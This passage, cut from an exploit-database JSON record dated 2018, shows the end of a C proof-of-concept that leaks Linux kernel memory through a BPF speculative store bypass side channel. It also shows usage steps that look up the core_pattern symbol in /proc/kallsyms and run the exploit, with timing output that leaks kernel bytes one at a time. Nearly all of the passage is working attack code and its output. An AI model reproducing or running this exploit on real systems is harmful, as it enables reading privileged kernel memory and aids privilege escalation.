SUCCESSFULLY\");\r\n }\r\n \r\n/*\r\n puts(\"testing flushed...\\n\");\r\n for (int i=-1; i<10; i++) {\r\n unsigned int res = array_time_flush_loc(leak_map, 0, 2048);\r\n if (i >= 0)\r\n printf(\" %u\\n\", res);\r\n }\r\n*/\r\n \r\n unsigned long base_addr = strtoull(argv[1], NULL, 16);\r\n for (int i=0; i<atoi(argv[2]); i++) {\r\n unsigned long addr = base_addr + i;\r\n unsigned char leaked = leak_byte(addr);\r\n printf(\"%016lx: 0x%02hhx ('%c')\\n\", addr, leaked, leaked);\r\n }\r\n \r\n \r\n return 0;\r\n}\r\n \r\n*/\r\n----------------------- END -----------------------\r\n \r\nPoC usage:\r\n \r\n$ sudo grep core_pattern /proc/kallsyms\r\nffffffff9b2954e0 D core_pattern\r\n$ gcc -o bpf_store_skipper_assisted bpf_store_skipper_assisted.c\r\n$ time ./bpf_store_skipper_assisted ffffffff9b2954e0 5\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\nBPF PROG LOADED SUCCESSFULLY\r\n4 vs 96\r\n1 vs 99\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n2 vs 98\r\n0 vs 100\r\n100 vs 0\r\nffffffff9b2954e0: 0x63 ('c')\r\n2 vs 98\r\n1 vs 99\r\n1 vs 99\r\n1 vs 99\r\n100 vs 0\r\n2 vs 98\r\n0 vs 100\r\n100 vs 0\r\nffffffff9b2954e1: 0x6f ('o')\r\n100 vs 0\r\n3 vs 97\r\n100 vs 0\r\n100 vs 0\r\n1 vs 99\r\n2 vs 98\r\n0 vs 100\r\n100 vs 0\r\nffffffff9b2954e2: 0x72 ('r')\r\n2 vs 98\r\n100 vs 0\r\n0 vs 100\r\n100 vs 0\r\n100 vs 0\r\n0 vs 100\r\n0 vs 100\r\n100 vs 0\r\nffffffff9b2954e3: 0x65 ('e')\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\n100 vs 0\r\nffffffff9b2954e4: 0x00 ('')\r\n \r\nreal 0m31.591s\r\nuser 0m2.547s\r\nsys 0m27.429s\r\n*/\n\n# 0day.today [2018-05-23] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30428"}]}
